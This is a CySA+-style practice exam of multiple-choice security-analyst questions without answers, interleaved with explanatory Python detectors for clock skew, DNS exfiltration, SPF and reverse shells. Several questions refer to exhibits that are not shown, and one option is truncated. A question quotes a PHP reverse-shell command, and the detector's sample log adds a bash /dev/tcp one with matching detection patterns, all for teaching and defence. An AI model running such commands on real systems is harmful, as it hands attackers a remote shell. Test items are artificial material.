CYSA 4

Description:
CYSA Test 4

Creation Date: 2025/09/17

Category: Others

Number of questions: 52

Content:

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?
A. Publicly disclose the request to other vendors
B. Notify the departments involved to preserve potentially
C. Establish a chain of custody starting with the attorney's request
D. Back up the mailboxes on the server and provide the attorney with a copy

A company has the following security requirements:
• No public IPs
• All data secured at rest
• No insecure ports/protocols
After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:
Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?
A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01

Which of the following best describes the actions taken by an organization after the resolution of an incident that addresses issues and reflects on the growth opportunities for future incidents?
A. Lessons learned
B. Scrum review
C. Root cause analysis
D. Regulatory compliance

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?
A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation

To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization's cloud services. Which of the following security controls has the analyst configured?
A. Preventive
B. Corrective
C. Directive
D. Detective

A web developer reports the following error that appeared on a development server when testing a new application:
Which of the following tools can be used to identify the application's point of failure?
A. OpenVAS
B. Angry IP scanner
C. Immunity debugger
D. Burp Suite

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?
A. MOU
B. NDA
C. BIA
D. SLA

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?
A. Block the attacks using firewall rules
B. Deploy an IPS in the perimeter network
C. Roll out a CDN
D. Implement a load balancer

An analyst is reviewing system logs while threat hunting:
Which of the following hosts should be investigated first?
A. PC1
B. PC2
C. PC3
D. PC4
E. PC5

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?
A. DLP
B. NAC
C. EDR
D. NIDS

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best reason for developing the organization's communication plans?
A. For the organization's public relations department to have a standard notification
B. To ensure incidents are immediately reported to a regulatory agency
C. To automate the notification to customers who were impacted by the breach
D. To have approval from executive leadership on when communication should occur

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?
A. MFA
B. User and password
C. PAM
D. Key pair

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface:
Which of the following exploits is most likely being attempted?
A. SQL injection
B. Local file inclusion
C. Cross-site scripting
D. Directory traversal

Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?
A. Turn on all systems, scan for infection, and back up data to a USB storage device
B. Identify and remove the software installed on the impacted systems in the department
C. Explain that malware cannot truly be removed and then reimage the devices
D. Log on to the impacted systems with an administrator account that has privileges to perform backups
E. Segment the entire department from the network and review each computer offline

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?
A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours

A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed?
A. SIEM
B. SOAR
C. IPS
D. CERT

Which of the following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?
A. Install a firewall
B. Implement vulnerability management
C. Deploy sandboxing
D. Update the application blocklist

A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement?
A. Reverse engineering
B. Known environment testing
C. Dynamic application security testing
D. Code debugging

A security analyst scans a host and generates the following output:
Which of the following best describes the output?
A. The host is unresponsive to the ICMP request
B. The host is running a vulnerable mail server
C. The host is allowing unsecured FTP connections
D. The host is vulnerable to web-based exploits

The security team at a company, which was a recent target of ransomware, compiled a list of hosts that were identified as impacted and in scope for this incident. Based on the following host list:
Which of the following systems was most pivotal to the threat actor in its distribution of the encryption binary via Group Policy?
A. SQL01
B. WK10-Sales07
C. WK7-Plant01
D. DCEast01
E. HQAdmin9

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?
A. SIEM ingestion logs are reduced by 20%
B. Phishing alerts drop by 20%
C. False positive rates drop to 20%
D. The MTTR decreases by 20%

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?
A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf

A cybersecurity analyst is recording the following details:
• ID
• Name
• Description
• Classification of information
• Responsible party
In which of the following documents is the analyst recording this information?
A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan

A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?
A. Trends
B. Risk score
C. Mitigation
D. Prioritization

While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?
A. If appropriate logging levels are set
B. NTP configuration on each system
C. Behavioral correlation settings
D. Data normalization rules

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?
A. The risk would not change because network firewalls are in use
B. The risk would decrease because RDP is blocked by the firewall
C. The risk would decrease because a web application firewall is in place
D. The risk would increase because the host is external facing

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.)
A. Performing dynamic application security testing
B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:
Which of the following vulnerabilities is the security analyst trying to validate?
A. SQL injection
B. LFI
C. XSS
D. CSRF

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following does this most likely describe?
A. System hardening
B. Hybrid network architecture
C. Continuous authorization
D. Secure access service edge

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?
A. Offline storage
B. Evidence collection
C. Integrity validation
D. Legal hold

An analyst investigated a website and produced the following:
Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?
A. nmap -sS -T4 -F insecure.org
B. nmap -C insecure.org
C. nmap -sV -T4 -F insecure.org
D. nmap -A insecure.org

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?
A. The NTP server is not configured on the host
B. The cybersecurity analyst is looking at the wrong information
C. The firewall is using UTC time
D. The host with the logs is offline
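The two SIEM questions above (failing correlation, and a firewall and host 43 minutes apart) come down to the same check a practitioner makes before trusting a timeline: normalise every source to UTC and measure the residual skew. An offset that is a whole number of quarter-hours is almost always a time zone mistake; anything else is an unsynchronised clock. The script below is an added example and not part of the quiz; the two log lines, host names and addresses are constructed for the demonstration.

```python
"""Measure clock skew between two log sources before correlating them in a SIEM.

Added example, not from the original quiz. The log lines below are constructed:
the firewall records a connection in UTC, the workstation records the matching
logon in local time (+01:00) from a clock that has drifted by 43 minutes.
"""
from datetime import datetime, timedelta, timezone

FIREWALL_LINE = "2025-09-17T10:02:11+00:00 fw01 ALLOW 10.0.5.23:51544 -> 10.0.9.8:445"
HOST_LINE = "2025-09-17T11:45:11+01:00 ws-finance-07 EventID=4624 src=10.0.5.23"


def parse_ts(line: str) -> datetime:
    """Take the leading ISO-8601 timestamp of a log line and normalise it to UTC.
    A timestamp with no zone information is refused: guessing a zone here is
    exactly how correlation silently goes wrong."""
    stamp = line.split(" ", 1)[0]
    dt = datetime.fromisoformat(stamp)
    if dt.tzinfo is None:
        raise ValueError(f"timestamp {stamp!r} carries no zone; cannot correlate safely")
    return dt.astimezone(timezone.utc)


def skew_minutes(reference_line: str, other_line: str) -> float:
    """Signed offset (minutes) of the second source relative to the first."""
    return (parse_ts(other_line) - parse_ts(reference_line)).total_seconds() / 60


def classify_skew(minutes: float, tolerance: float = 1.0) -> str:
    """Distinguish a zone misconfiguration from an unsynchronised clock.
    Nearly all zones sit a multiple of 15 minutes from UTC, so a skew that is a
    whole quarter-hour points at a zone problem; any other value is drift."""
    m = abs(minutes)
    if m <= tolerance:
        return "in sync"
    if m % 15 == 0:
        return "timezone mismatch"
    return "clock drift (check NTP)"


def realigned(line: str, skew: float) -> datetime:
    """Shift a source's timestamp by the measured skew so it lines up with the
    reference source for timeline building (a stop-gap until NTP is fixed)."""
    return parse_ts(line) - timedelta(minutes=skew)


if __name__ == "__main__":
    skew = skew_minutes(FIREWALL_LINE, HOST_LINE)
    print(f"host is {skew:+.1f} min from firewall: {classify_skew(skew)}")
    print("host event realigned:", realigned(HOST_LINE, skew).isoformat())
```

Run against the constructed lines, the host comes out 43 minutes ahead and is classified as drift rather than a zone problem, which is why "NTP not configured on the host" is the right diagnosis in the question: a UTC-versus-local mistake would have produced a 60-minute offset.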

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?
A. Scan the employee's computer with virus and malware tools
B. Review the actions taken by the employee and the email related to the event
C. Contact human resources and recommend the termination of the employee
D. Assign security awareness training to the employee involved in the incident

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:
• DNS traffic while a tunneling session is active
• The mean time between queries is less than one second
• The average query length exceeds 100 characters
Which of the following attacks most likely occurred?
A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning
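The two measurable indicators in that question (sub-second query spacing and names over 100 characters) are enough to build a first-pass detector over a DNS query log. The script below is an added example, not part of the quiz: it profiles each client, then flags those that exceed both thresholds. The query log is constructed; `_exfil_name` manufactures the long, encoded-looking names a tunnelling client emits, and the `.t.example.net` suffix is a placeholder for the attacker's domain.

```python
"""Flag DNS tunnelling or exfiltration from a query log by rate and query length.

Added example, not from the original quiz. The log is constructed; the thresholds
mirror the indicators in the question (mean gap under one second, mean query
length over 100 characters).
"""
import statistics
from datetime import datetime


def _exfil_name(i: int) -> str:
    """Build a long encoded-looking name of the kind a tunnelling client emits.
    Two 50-character labels keep each label under the 63-character DNS limit."""
    label = ("%02x" % i) * 25
    return f"{label}.{label}.t.example.net"


# Constructed query log: (timestamp, client IP, queried name).
# 10.0.5.40 is ordinary browsing; 10.0.5.23 fires long queries 300 ms apart.
QUERY_LOG = [
    ("2025-09-17T09:00:00.000", "10.0.5.40", "www.example.com"),
    ("2025-09-17T09:00:04.200", "10.0.5.40", "cdn.example.org"),
    ("2025-09-17T09:00:09.900", "10.0.5.40", "mail.example.com"),
] + [
    (f"2025-09-17T09:01:00.{i * 300:03d}", "10.0.5.23", _exfil_name(i))
    for i in range(4)
]


def profile(records):
    """Per-client mean inter-query interval (seconds) and mean query length."""
    by_client = {}
    for ts, client, name in records:
        by_client.setdefault(client, []).append((datetime.fromisoformat(ts), name))
    result = {}
    for client, rows in by_client.items():
        rows.sort()  # log order is not guaranteed to be time order
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(rows, rows[1:])]
        result[client] = {
            "queries": len(rows),
            "mean_interval": statistics.mean(gaps) if gaps else float("inf"),
            "mean_length": statistics.mean(len(name) for _, name in rows),
        }
    return result


def suspected_exfil(records, max_interval=1.0, min_length=100, min_queries=3):
    """Clients whose query rate and query length both cross the thresholds.
    A minimum query count stops one long lookup (e.g. a DKIM selector) from
    being flagged on its own."""
    return sorted(
        client
        for client, stats in profile(records).items()
        if stats["queries"] >= min_queries
        and stats["mean_interval"] < max_interval
        and stats["mean_length"] > min_length
    )


if __name__ == "__main__":
    for client, stats in profile(QUERY_LOG).items():
        print(client, stats)
    print("suspected exfiltration:", suspected_exfil(QUERY_LOG))
```

On the constructed log only 10.0.5.23 is returned. In production this pairs naturally with a check on the number of distinct subdomains per parent domain, since a tunnel must keep changing the name to carry new data, whereas both spoofing and poisoning answers in the question leave no such footprint in the client's own query pattern.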

A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?
A. Corrective controls
B. Compensating controls
C. Operational controls
D. Administrative controls

During the log analysis phase, the following suspicious command is detected:
Which of the following is being attempted?
A. Buffer overflow
B. RCE
C. ICMP tunneling
D. Smurf attack

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?
A. DKIM
B. SPF
C. SMTP
D. DMARC
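SPF is the right answer because receivers check the connecting IP against the sending domain's published list; a new range that is not listed fails (or soft-fails) regardless of DKIM or DMARC. The script below is an added example and not part of the quiz: it evaluates the `ip4`/`ip6`/`include`/`all` mechanisms of a record, shows the result before and after the provider adds the new range, and counts the lookup-costing terms that RFC 7208 caps at ten. The records, domain names and address ranges are constructed and held in a dict in place of real DNS resolution; the hosting provider's shared record is assumed to be reached through `include:`, which is the common pattern for hosted mail.

```python
"""Evaluate and update an SPF record for a new sending range.

Added example, not from the original quiz. RECORDS stands in for DNS TXT
lookups; the domains and ranges are constructed (RFC 5737 documentation space).
Only ip4/ip6/include/all are evaluated; a, mx, ptr and exists are skipped.
"""
import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
LOOKUP_TERMS = ("include", "a", "mx", "ptr", "exists", "redirect")

# Constructed: the customer's domain delegates to the hosting provider's record.
RECORDS = {
    "example.com": "v=spf1 include:_spf.mailhost.example ~all",
    "_spf.mailhost.example": "v=spf1 ip4:198.51.100.0/24 -all",
}
NEW_DC_RANGE = "203.0.113.0/24"  # constructed range of the new data center


def spf_check(domain: str, ip: str, records: dict, depth: int = 0) -> str:
    """Return the SPF result ('pass', 'fail', 'softfail', 'neutral', 'none')
    for a connection from `ip` claiming `domain`."""
    if depth > 10:
        raise ValueError("include nesting exceeds the RFC 7208 lookup limit")
    record = records.get(domain)
    if not record or not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        if name in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)  # bare IP means /32 or /128
            if addr.version == net.version and addr in net:
                return QUALIFIERS[qualifier]
        elif name == "include":
            # include matches only when the referenced record yields pass
            if spf_check(arg, ip, records, depth + 1) == "pass":
                return QUALIFIERS[qualifier]
        elif name == "all":
            return QUALIFIERS[qualifier]
    return "neutral"


def add_ip4(record: str, cidr: str) -> str:
    """Add an ip4 mechanism, keeping the terminating 'all' term last."""
    new_term = f"ip4:{ipaddress.ip_network(cidr, strict=True)}"
    terms = record.split()
    if new_term in terms:
        return record
    body = [t for t in terms if t.lstrip("+-~?") != "all"]
    tail = [t for t in terms if t.lstrip("+-~?") == "all"]
    return " ".join(body + [new_term] + tail)


def dns_lookup_terms(record: str) -> int:
    """Count terms that cost a DNS lookup (capped at 10 by RFC 7208).
    ip4/ip6 terms are free, one reason to list ranges literally."""
    count = 0
    for term in record.split()[1:]:
        name = term.lstrip("+-~?").split(":")[0].split("=")[0].split("/")[0]
        if name in LOOKUP_TERMS:
            count += 1
    return count


# The fix belongs in the provider's record; the customer's record is unchanged.
UPDATED = dict(RECORDS)
UPDATED["_spf.mailhost.example"] = add_ip4(RECORDS["_spf.mailhost.example"], NEW_DC_RANGE)

if __name__ == "__main__":
    for label, recs in (("before", RECORDS), ("after", UPDATED)):
        print(label, spf_check("example.com", "203.0.113.25", recs))
    print("lookup terms in example.com:", dns_lookup_terms(RECORDS["example.com"]))
```

Before the update a message from 203.0.113.25 soft-fails at `~all`; after the provider adds `ip4:203.0.113.0/24` it passes, and every customer that uses `include:_spf.mailhost.example` benefits without touching their own zone. Adding the range as `ip4` rather than another `include` also keeps the provider's customers under the ten-lookup limit.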

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?
A. XDR logs
B. Firewall logs
C. IDS logs
D. MFA logs

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?
A. To provide metrics and test continuity controls
B. To verify the roles of the incident response team
C. To provide recommendations for handling vulnerabilities
D. To perform tests against implemented security controls

A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?
A. Perform non-credentialed scans
B. Ignore embedded web server ports
C. Create a tailored scan for the printer subnet
D. Increase the threshold length of the scan timeout

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:
• Must use minimal network bandwidth
• Must use minimal host resources
• Must provide accurate, near real-time updates
• Must not have any stored credentials in configuration on the scanner
Which of the following vulnerability scanning methods should be used to best meet these requirements?
A. Internal
B. Agent
C. Active
D. Uncredentialed

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?
A. RFI
B. LFI
C. CSRF
D. XSS

Which of the following does "federation" most likely refer to within the context of identity and access management?
A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains
C. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user
D. Correlating one's identity with the attributes and associated applications the user has access to

The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two.)
A. SOAR
B. SIEM
C. MSP
D. NGFW
E. XDR
F. DLP

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?
A. Hacktivist threat
B. Advanced persistent threat
C. Unintentional insider threat
D. Nation-state threat

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?
A. Cross-reference the signature with open-source threat intelligence
B. Configure the EDR to perform a full scan
C. Transfer the malware to a sandbox environment
D. Log in to the affected systems and run netstat

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?
A. A local red team member is enumerating the local RFC1918 segment to enumerate hosts
B. A threat actor has a foothold on the network and is sending out control beacons
C. An administrator executed a new database replication process without notifying the SOC
D. An insider threat actor is running Responder on the local segment, creating traffic replication

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
A. Log retention
B. Log rotation
C. Maximum log size
D. Threshold value

While reviewing web server logs, a security analyst discovers the following suspicious line:
php -r '$socket=fsockopen("10.0.0.1", 1234); passthru("/bin/sh -i <&3 >&3 2>&3");'
Which of the following is being attempted?
A. Remote file inclusion
B. Command injection
C. Server-side request forgery
D. Reverse shell
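The line in that question has the two halves every reverse shell needs: an outbound connection (`fsockopen` to 10.0.0.1:1234) and a shell whose standard streams are wired to that socket (`/bin/sh -i <&3 >&3 2>&3`, file descriptor 3 being the socket PHP just opened). The same shape recurs in the bash `/dev/tcp` and `nc -e` variants, and in web logs it usually arrives URL-encoded. The script below is an added example, not part of the quiz: it decodes each log line, matches the recurring indicators, and pulls out the callback address and port so the responder can block egress and pivot on the attacker host. The Apache-style log lines are constructed; the PHP command is the one from the question, and the other samples, hosts and addresses are assumptions for the demonstration.

```python
"""Spot reverse-shell invocations in web server log lines.

Added example, not from the original quiz. SAMPLE_LOG is constructed; the PHP
command is the one quoted in the question, URL-encoded as it would appear in an
access log, alongside a bash /dev/tcp variant and two benign requests.
"""
import re
from urllib.parse import quote, unquote_plus

PHP_SHELL = "php -r '$socket=fsockopen(\"10.0.0.1\", 1234); passthru(\"/bin/sh -i <&3 >&3 2>&3\");'"

SAMPLE_LOG = [
    '10.0.0.5 - - [17/Sep/2025:10:02:11 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123',
    '10.0.0.5 - - [17/Sep/2025:10:02:19 +0000] "GET /shell.php?cmd='
    + quote(PHP_SHELL, safe="") + ' HTTP/1.1" 200 0',
    '10.0.0.5 - - [17/Sep/2025:10:02:40 +0000] "POST /api/run HTTP/1.1" 200 0 '
    '"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"',
    # benign: mentions fsockopen but there is no shell execution behind it
    '10.0.0.9 - - [17/Sep/2025:10:03:02 +0000] "GET /search?q=fsockopen+tutorial HTTP/1.1" 200 2311',
]

# Each indicator pairs a name with a pattern over the URL-decoded line.
INDICATORS = [
    # a socket is opened and then a shell is executed with a PHP exec function
    ("php socket + shell", re.compile(
        r"fsockopen\s*\(.*?\b(?:passthru|exec|system|shell_exec|popen|proc_open)\s*\(.*?/bin/(?:ba)?sh",
        re.I)),
    ("bash /dev/tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+", re.I)),
    ("netcat -e", re.compile(r"\bn(?:c|cat)\b[^\"']*\s-e\s", re.I)),
    # stdin/stdout/stderr redirected to a numbered descriptor (the socket)
    ("fd redirection", re.compile(r"[<>]&\d")),
]

CALLBACK = re.compile(
    r"fsockopen\s*\(\s*[\"']([\d.]+)[\"']\s*,\s*(\d+)|/dev/tcp/([\d.]+)/(\d+)"
)


def scan_log(lines):
    """Return [(line_index, [indicator names])] for lines matching any indicator.
    Lines are URL-decoded once first; doubly-encoded payloads need another pass."""
    hits = []
    for i, raw in enumerate(lines):
        text = unquote_plus(raw)
        names = [name for name, rx in INDICATORS if rx.search(text)]
        if names:
            hits.append((i, names))
    return hits


def callback_target(line):
    """Extract (ip, port) the shell connects back to, or None if not recognised."""
    m = CALLBACK.search(unquote_plus(line))
    if not m:
        return None
    ip = m.group(1) or m.group(3)
    port = m.group(2) or m.group(4)
    return ip, int(port)


if __name__ == "__main__":
    for idx, names in scan_log(SAMPLE_LOG):
        print(idx, names, callback_target(SAMPLE_LOG[idx]))
```

The benign search for "fsockopen tutorial" is not flagged because the PHP indicator requires both the socket call and an exec-family call with a shell path on the same line; requiring the pair is what keeps a rule like this usable in a SIEM. The extracted callback (10.0.0.1:1234 for the question's line) is the immediate containment artifact: an egress block to it stops the session while the web shell itself is removed.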

Which of the following should be updated after a lessons-learned review?
A. Disaster recovery plan
B. Business continuity plan
C. Tabletop exercise
D. Incident response plan

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?
A. Perform static analyses using an integrated development environment
B. Deploy compensating controls into the environment
C. Implement server-side logging and automatic updates
D. Conduct regular code reviews using OWASP best practices
